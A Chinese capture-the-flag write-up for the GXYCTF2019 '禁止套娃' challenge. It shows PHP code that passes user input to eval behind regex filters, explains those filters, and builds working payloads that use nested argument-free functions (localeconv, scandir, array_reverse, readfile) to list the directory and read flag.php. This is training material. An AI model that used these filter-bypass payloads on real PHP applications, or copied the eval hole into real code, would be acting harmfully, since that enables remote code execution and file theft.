[GXYCTF2019]禁止套娃
<?php
include "flag.php";//执行并包含flag.php
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){//以get方式提交exp,非空且为字符串
if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
// echo $_GET['exp'];
@eval($_GET['exp']);
}
else{
die("还差一点哦!");
}
}
else{
die("再好好想想!");
}
}
else{
die("还想读flag,臭弟弟!");
}
}
// highlight_file(__FILE__);
?>
第一个
正则表达式将会过滤data://,filter://,php://,phar://等伪协议读取flag.php
php中的!号作用通俗点理解就是否定的意思 比如: a==b 表示a要等于b, !a==b 表示a不等于b
pret_match()函数是正则表权达式匹配, 匹配成功就返回true, 匹配不成功就返回false 前面加个!那就需要这个函数返回false, 也就是没有匹配上
第二个
preg_replace()函数,preg_replace('/[a-z,]+((?R)?)/', NULL, $GET['exp']),主要功能就是限制我们传输进来的必须是纯小写字母的函数,而且不能携带参数
第三个
则直白的过滤了et|na|info|dec|bin|hex|oct|pi|log
一三两个规则很好理解,关键在于第二个preg_replace()函数的具体作用,也就是无参数函数校验
什么是无参数函数RCE
当我们有eval($_GET['exp']);时,代表着拥有了一句话木马,可以getshell,但是如果有
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {
eval($_GET['exp']);
}
限制时,我们使用的参数则无法通过校验,但是允许如下格式通过
print_r(scandir('a()'));可以使用
print_r(scandir('a(b(c()))'));可以使用
print_r(scandir('123'));不可以使用
而preg_replace内的(?R)代表引用当前表达式,后面加了?递归调用。只能匹配通过无参数的函数。
既然允许通过print_r(scandir('a(b(c()))'));这种格式,将需要查看的flag套娃在内,如scandir()函数可以扫描当前目录下的文件
在phpstudy的www下创建一个php文件:
<?php
print_r(scandir('.'));
?>
访问:
既然这样,利用scandir('.')即可尝试查看flag,可惜失败了
这里引入两个函数
localeconv() 函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是.
current()函数 返回数组中的当前单元, 默认取第一个值
将第一个函数套入第二个函数,也就是current(localeconv()),这样就永远返回'.'
构造payload:
?exp=print_r(scandir(current(localeconv())));
既然查看到flag.php在倒数第二个数组内,只要解决如何查看的问题即可提交flag
array_reverse()以相反的元素顺序返回数组
next()函数将数组中内部指针向前移动一位
构造payload:
?exp=print_r(next(array_reverse(scandir(current(localeconv())))));
如何读取flag?
readfile()
highlight_file()
构造payload(都可得flag):
?exp=print_r(readfile(next(array_reverse(scandir(current(localeconv()))))));
?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));